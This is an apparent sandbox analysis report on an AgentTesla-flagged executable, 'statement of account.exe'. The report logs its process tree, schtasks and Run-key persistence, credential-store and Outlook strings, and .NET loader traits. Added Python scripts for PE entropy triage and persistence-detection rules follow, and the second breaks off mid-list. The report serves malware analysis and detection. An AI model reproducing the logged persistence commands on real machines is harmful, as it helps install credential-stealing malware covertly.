                Source: Process Memory Space: statement of account.exe PID: 1568, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 0_2_00EAC0D4
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 0_2_00EAE5A0
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 0_2_00EAE598
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 0_2_07279AD8
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 0_2_07279AC8
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 0_2_0728D3F0
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 0_2_07284B10
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 0_2_07281A18
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 0_2_0728D630
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 3_2_02DFF3B8
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 3_2_02DFF700
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 3_2_02DFB078
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 3_2_02DF6482
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 3_2_067E8598
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 3_2_067EE218
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 3_2_06AEDEC8
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 3_2_06AED7B8
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 3_2_06AEACF8
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 3_2_06AEDE64
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 3_2_06AECC18
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 3_2_06AE3330
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 3_2_06B38635
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 3_2_06B33618
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 3_2_06B33A58
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 3_2_06B35980
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 3_2_06B37568
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 3_2_06B3C158
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 3_2_06B3C89A
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 3_2_06B3C998
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 3_2_06B3E760
                Source: statement of account.exe, 00000000.00000002.283918247.0000000002C71000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCassa.dll< vs statement of account.exe
                Source: statement of account.exe, 00000000.00000002.283918247.0000000002C71000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename159a3513-189a-4a39-a83d-9c07ca495265.exe4 vs statement of account.exe
                Source: statement of account.exe, 00000000.00000002.290824392.0000000003D9C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMajorRevision.exe< vs statement of account.exe
                Source: statement of account.exe, 00000000.00000002.290824392.0000000003D9C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename159a3513-189a-4a39-a83d-9c07ca495265.exe4 vs statement of account.exe
                Source: statement of account.exe, 00000000.00000000.242663190.00000000007C2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilename1xOMKkLm.exeH vs statement of account.exe
                Source: statement of account.exe, 00000000.00000002.301316535.00000000073F0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMajorRevision.exe< vs statement of account.exe
                Source: statement of account.exe, 00000000.00000002.281387531.0000000001008000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs statement of account.exe
                Source: statement of account.exe, 00000000.00000002.292671867.0000000003F4E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename1xOMKkLm.exeH vs statement of account.exe
                Source: statement of account.exe, 00000003.00000000.271720897.0000000000436000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilename159a3513-189a-4a39-a83d-9c07ca495265.exe4 vs statement of account.exe
                Source: statement of account.exe, 00000003.00000002.507525253.00000000010F8000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs statement of account.exe
                Source: statement of account.exe, 00000003.00000003.323559038.00000000065AF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename1xOMKkLm.exeH vs statement of account.exe
                Source: statement of account.exe | Binary or memory string: OriginalFilename1xOMKkLm.exeH vs statement of account.exe
                Source: statement of account.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: LtdekfbHULJt.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: LIhMQ.exe.3.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: statement of account.exe | ReversingLabs: Detection: 69%
                Source: statement of account.exe | Virustotal: Detection: 36%
                Source: C:\Users\user\Desktop\statement of account.exe | File read: C:\Users\user\Desktop\statement of account.exe
                Source: statement of account.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\statement of account.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknown | Process created: C:\Users\user\Desktop\statement of account.exe C:\Users\user\Desktop\statement of account.exe
                Source: C:\Users\user\Desktop\statement of account.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LtdekfbHULJt" /XML "C:\Users\user\AppData\Local\Temp\tmp86BD.tmp
                Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\statement of account.exe | Process created: C:\Users\user\Desktop\statement of account.exe {path}
                Source: unknown | Process created: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe
                Source: unknown | Process created: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe "C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe"
                Source: unknown | Process created: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe "C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe"
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LtdekfbHULJt" /XML "C:\Users\user\AppData\Local\Temp\tmp26F5.tmp
                Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe | Process created: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe {path}
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe | Process created: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe {path}
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LtdekfbHULJt" /XML "C:\Users\user\AppData\Local\Temp\tmp4337.tmp
                Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe | Process created: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe {path}
                Source: C:\Users\user\Desktop\statement of account.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LtdekfbHULJt" /XML "C:\Users\user\AppData\Local\Temp\tmp86BD.tmp
                Source: C:\Users\user\Desktop\statement of account.exe | Process created: C:\Users\user\Desktop\statement of account.exe {path}
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LtdekfbHULJt" /XML "C:\Users\user\AppData\Local\Temp\tmp4337.tmp
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe | Process created: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe {path}
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LtdekfbHULJt" /XML "C:\Users\user\AppData\Local\Temp\tmp26F5.tmp
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe | Process created: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe {path}
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe | Process created: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe {path}
                Source: C:\Users\user\Desktop\statement of account.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                Source: C:\Users\user\Desktop\statement of account.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\statement of account.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\statement of account.exe | File created: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe
                Source: C:\Users\user\Desktop\statement of account.exe | File created: C:\Users\user\AppData\Local\Temp\tmp86BD.tmp
                Source: classification engine | Classification label: mal100.troj.adwa.spyw.evad.winEXE@21/10@3/2
                Source: C:\Users\user\Desktop\statement of account.exe | File read: C:\Users\user\Desktop\desktop.ini
                Source: statement of account.exe, 00000003.00000002.538222623.000000000331D000.00000004.00000800.00020000.00000000.sdmp, LIhMQ.exe, 00000013.00000002.536585995.0000000003397000.00000004.00000800.00020000.00000000.sdmp, LtdekfbHULJt.exe, 00000016.00000002.538095937.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: statement of account.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Users\user\Desktop\statement of account.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\Desktop\statement of account.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe | Mutant created: \Sessions\1\BaseNamedObjects\lwJpmEYBVlDhLVqonoBA
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5244:120:WilError_01
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5304:120:WilError_01
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:408:120:WilError_01
                Source: 3.0.statement of account.exe.400000.0.unpack, A/F1.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: 3.0.statement of account.exe.400000.0.unpack, A/F1.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: C:\Users\user\Desktop\statement of account.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\Desktop\statement of account.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\statement of account.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Users\user\Desktop\statement of account.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: statement of account.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: statement of account.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: statement of account.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: 1xOMKkLm.pdb source: statement of account.exe, LtdekfbHULJt.exe.0.dr, LIhMQ.exe.3.dr
                Source: Binary string: 1xOMKkLm.pdbSHA256 source: statement of account.exe, LtdekfbHULJt.exe.0.dr, LIhMQ.exe.3.dr

                Data Obfuscation

                Source: statement of account.exe, Form1.cs | .Net Code: XCXCXCXCXCXCXC System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                Source: LtdekfbHULJt.exe.0.dr, Form1.cs | .Net Code: XCXCXCXCXCXCXC System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                Source: 0.0.statement of account.exe.7c0000.0.unpack, Form1.cs | .Net Code: XCXCXCXCXCXCXC System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                Source: LIhMQ.exe.3.dr, Form1.cs | .Net Code: XCXCXCXCXCXCXC System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                Source: statement of account.exe, Form1.cs | .Net Code: NewLateBinding.LateCall(A028, null, "Invoke", stackVariable31, null, null, stackVariable40, true)
                Source: LtdekfbHULJt.exe.0.dr, Form1.cs | .Net Code: NewLateBinding.LateCall(A028, null, "Invoke", stackVariable31, null, null, stackVariable40, true)
                Source: 0.0.statement of account.exe.7c0000.0.unpack, Form1.cs | .Net Code: NewLateBinding.LateCall(A028, null, "Invoke", stackVariable31, null, null, stackVariable40, true)
                Source: LIhMQ.exe.3.dr, Form1.cs | .Net Code: NewLateBinding.LateCall(A028, null, "Invoke", stackVariable31, null, null, stackVariable40, true)
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 0_2_00EAE210 push edx; retn 0002h
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 0_2_00EAE469 push edx; retn 0002h
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 0_2_00EAE591 push ebx; retn 0002h
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 0_2_00EAE549 push ebx; retn 0002h
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 0_2_00EA8B69 push ss; retn 0002h
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 0_2_00EA8B78 push ss; retn C802h
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 0_2_00EAEED8 push esi; retn 0002h
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 0_2_00EAEEA7 push esi; retn 0002h
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 0_2_00EA94E0 push ds; retn 0002h
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 0_2_00EA9768 push ds; retn 0002h
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 0_2_00EA7B80 push cs; retn 0002h
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 0_2_00EA7B71 push cs; retn 0002h
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 0_2_07289322 pushad ; retf
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 3_2_067EA168 pushfd ; ret
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 3_2_06AE17AA push es; ret
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 3_2_06AE17A1 push es; ret
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 3_2_06AE17B9 push es; ret
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 3_2_06AE17B2 push es; ret
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 3_2_06AE178E push es; ret
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 3_2_06AE1782 push es; ret
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 3_2_06AE179A push es; ret
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 3_2_06AE1792 push es; ret
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 3_2_06AE17EA push es; ret
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 3_2_06AE17E2 push es; ret
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 3_2_06AE17CA push es; ret
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 3_2_06AE17C2 push es; ret
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 3_2_06AE17DA push es; ret
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 3_2_06AE17D1 push es; ret
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 3_2_06AE177A push es; ret
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 3_2_06AE2520 push edi; ret
                Source: C:\Users\user\Desktop\statement of account.exe | Code function: 3_2_06AE3330 push es; iretd
                Source: initial sample | Static PE information: section name: .text entropy: 7.547588668070066
                Source: initial sample | Static PE information: section name: .text entropy: 7.547588668070066
                Source: initial sample | Static PE information: section name: .text entropy: 7.547588668070066
                Source: C:\Users\user\Desktop\statement of account.exe | File created: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe
                Source: C:\Users\user\Desktop\statement of account.exe | File created: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe
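The entropy entries above (a .text section at about 7.55 bits per byte, on a section whose flags are only code, execute and read) are the measurement behind the packer finding: ordinary compiled x86 code sits well below that, so a near-random .text section means the real payload is still encrypted or compressed inside it, consistent with the AppDomain::Load(byte[]) loader in the .Net Code lines. The script below is an added example, not code from the Joe Sandbox report or from the sample: it parses the PE section table by hand, computes Shannon entropy per section and flags executable sections above a heuristic 7.0 threshold, plus any section that is both writable and executable. Because the analysed binary is not available here, it assembles a synthetic, non-loadable PE in memory whose .text is filled with PRNG bytes standing in for packed code (constructed data); the threshold, the section layout and the names used are assumptions for illustration, not values from the report.

```python
"""Per-section entropy triage for a PE file. Added example: the header parser, the
7.0 threshold and the synthetic demo image are assumptions for illustration and are
not taken from the report or the analysed sample."""
import math
import random
import struct
from collections import Counter

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
PACKED_THRESHOLD = 7.0  # heuristic: plain compiled code usually lands around 6.0-6.5 bits/byte


def shannon_entropy(data):
    """Bits of entropy per byte, from 0.0 (one repeated value) to 8.0 (uniform)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def pe_sections(blob):
    """Yield (name, characteristics, raw bytes) for every section header of a PE image."""
    if blob[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    pe_off = struct.unpack_from("<I", blob, 0x3C)[0]            # e_lfanew
    if blob[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    n_sections = struct.unpack_from("<H", blob, pe_off + 6)[0]  # COFF NumberOfSections
    opt_size = struct.unpack_from("<H", blob, pe_off + 20)[0]   # COFF SizeOfOptionalHeader
    table = pe_off + 24 + opt_size                              # section table follows the optional header
    for i in range(n_sections):
        off = table + 40 * i
        name, _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", blob, off)
        chars = struct.unpack_from("<I", blob, off + 36)[0]     # Characteristics
        yield name.rstrip(b"\0").decode("ascii", "replace"), chars, blob[raw_ptr:raw_ptr + raw_size]


def suspicious_sections(blob):
    """(name, entropy, reasons) for executable sections that look packed or are RWX."""
    findings = []
    for name, chars, raw in pe_sections(blob):
        ent = shannon_entropy(raw)
        reasons = []
        if chars & IMAGE_SCN_MEM_EXECUTE and ent > PACKED_THRESHOLD:
            reasons.append(f"executable section with entropy {ent:.2f}")
        if chars & IMAGE_SCN_MEM_EXECUTE and chars & IMAGE_SCN_MEM_WRITE:
            reasons.append("writable and executable")
        if reasons:
            findings.append((name, round(ent, 3), reasons))
    return findings


def build_pe(sections, file_align=0x200):
    """Assemble a minimal PE32 image from (name, characteristics, raw) tuples: enough
    header for the section parser above, deliberately not a loadable executable."""
    opt_size = 0xE0
    hdr_end = 0x40 + 24 + opt_size + 40 * len(sections)
    first_raw = -(-hdr_end // file_align) * file_align        # round up to file alignment
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)         # e_lfanew -> 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)      # PE32 magic, rest zeroed
    table, body, raw_ptr = b"", b"", first_raw
    for i, (name, chars, raw) in enumerate(sections):
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(raw), 0x1000 * (i + 1),
                             len(raw), raw_ptr, 0, 0, 0, 0, chars)
        padded = -(-len(raw) // file_align) * file_align
        body += raw.ljust(padded, b"\0")
        raw_ptr += padded
    return (dos + coff + opt + table).ljust(first_raw, b"\0") + body


def demo_image():
    """Constructed sample: a .text of seeded PRNG bytes (stands in for packed/encrypted
    code) beside a .rdata of repetitive plain text."""
    rng = random.Random(2022)
    packed_text = bytes(rng.getrandbits(8) for _ in range(4096))
    rdata = b"statement of account\0" * 64
    return build_pe([
        (b".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ, packed_text),
        (b".rdata", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ, rdata),
    ])


if __name__ == "__main__":
    for name, ent, reasons in suspicious_sections(demo_image()):
        print(f"{name}: {ent} bits/byte -> {'; '.join(reasons)}")
```

Run against a real file with `suspicious_sections(open(path, "rb").read())`. The threshold is a triage hint, not proof: .NET assemblies with large embedded resources and legitimately compressed installers also score high, so treat a hit as a reason to unpack and look, and pair it with the other static findings the report lists (the IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR directory marks this as managed code, so the high .text entropy points at an encrypted payload blob inside the assembly rather than at native packing).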

                Boot Survival

                Source: C:\Users\user\Desktop\statement of account.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LtdekfbHULJt" /XML "C:\Users\user\AppData\Local\Temp\tmp86BD.tmp
                Source: C:\Users\user\Desktop\statement of account.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run LIhMQ
                Source: C:\Users\user\Desktop\statement of account.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run LIhMQ
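The process tree and Boot Survival entries above record a compact persistence chain: the sample drops copies under %AppData%\Roaming (LtdekfbHULJt.exe and LIhMQ\LIhMQ.exe), writes a task definition to %TEMP% (tmp86BD.tmp) and registers it with schtasks.exe /Create /TN "Updates\LtdekfbHULJt" /XML, adds an HKCU Run value named LIhMQ, and starts a second copy of its own image with the literal argument {path}; the section that follows adds the opening of the dropped file's Zone.Identifier stream for delete. The script below is an added example, not part of the Joe Sandbox report: it turns those behaviours into four detection rules over a simplified, hypothetical event schema and runs them on constructed events modelled on the report's lines, with a benign installer creating a task from Program Files as a control. The Event class, its field names and the sample records are assumptions for illustration; mapping them onto a real source such as Sysmon or an EDR is left to the reader.

```python
"""Triage rules for the persistence and evasion behaviour recorded in this report.
Added example: the Event schema and the sample events are hypothetical, shaped after
the report's process, registry and file lines rather than any real telemetry format."""
import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str            # "process", "registry" or "file"
    image: str           # created process (process events) or acting process (others)
    parent: str = ""     # image of the creating process (process events)
    cmdline: str = ""    # command line of the created process
    target: str = ""     # registry value path or file path acted on
    access: str = ""     # requested file access, e.g. "read attributes | delete"


USER_TEMP = "\\appdata\\local\\temp\\"
RUN_KEY = "\\software\\microsoft\\windows\\currentversion\\run\\"


def _switch_value(cmdline, switch):
    """Value after a schtasks switch, quoted or not; a missing closing quote is tolerated."""
    m = re.search(re.escape(switch) + r'\s+"?([^"]+)', cmdline, re.IGNORECASE)
    return m.group(1).strip() if m else None


def schtasks_from_temp(ev):
    """schtasks.exe /Create whose /XML task definition lives in the user's Temp directory."""
    if ev.kind != "process" or not ev.image.lower().endswith("\\schtasks.exe"):
        return None
    xml = _switch_value(ev.cmdline, "/xml")
    if "/create" not in ev.cmdline.lower() or not xml or USER_TEMP not in xml.lower():
        return None
    task = _switch_value(ev.cmdline, "/tn") or "?"
    return f"task {task} defined by Temp file {xml} (parent {ev.parent})"


def run_key_from_user_profile(ev):
    """HKCU Run value written by a binary that itself executes from a user-writable path."""
    if ev.kind != "registry" or RUN_KEY not in ev.target.lower():
        return None
    if not ev.image.lower().startswith("c:\\users\\"):
        return None
    value_name = ev.target.rsplit("\\", 1)[-1]
    return f"Run value {value_name} set by {ev.image}"


def zone_identifier_delete(ev):
    """Mark-of-the-Web removal: a file's :Zone.Identifier stream opened with delete access."""
    if ev.kind != "file" or not ev.target.lower().endswith(":zone.identifier"):
        return None
    if "delete" not in ev.access.lower():
        return None
    return f"{ev.image} stripped Zone.Identifier from {ev.target.rsplit(':', 1)[0]}"


def self_relaunch(ev):
    """A process starting a second copy of its own image, the usual staging step before injection."""
    if ev.kind != "process" or not ev.parent or ev.image.lower() != ev.parent.lower():
        return None
    return f"{ev.image} relaunched itself with arguments {ev.cmdline!r}"


RULES = (schtasks_from_temp, run_key_from_user_profile, zone_identifier_delete, self_relaunch)


def triage(events):
    """(rule name, finding) for every rule that fires, in event order."""
    hits = []
    for ev in events:
        for rule in RULES:
            finding = rule(ev)
            if finding:
                hits.append((rule.__name__, finding))
    return hits


# Constructed sample events modelled on the report's process tree and registry/file lines.
SAMPLE = "C:\\Users\\user\\Desktop\\statement of account.exe"
DROPPED = "C:\\Users\\user\\AppData\\Roaming\\LIhMQ\\LIhMQ.exe"
SAMPLE_EVENTS = [
    Event("process", "C:\\Windows\\SysWOW64\\schtasks.exe", parent=SAMPLE,
          cmdline='C:\\Windows\\System32\\schtasks.exe" /Create /TN "Updates\\LtdekfbHULJt" '
                  '/XML "C:\\Users\\user\\AppData\\Local\\Temp\\tmp86BD.tmp'),
    Event("process", "C:\\Windows\\System32\\conhost.exe",
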